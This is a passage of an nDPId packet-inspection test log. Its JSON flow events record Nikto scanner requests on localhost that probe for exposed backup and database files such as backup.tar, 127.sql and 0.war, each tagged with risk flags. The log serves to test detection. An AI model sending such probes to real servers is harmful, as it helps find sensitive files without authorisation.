IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 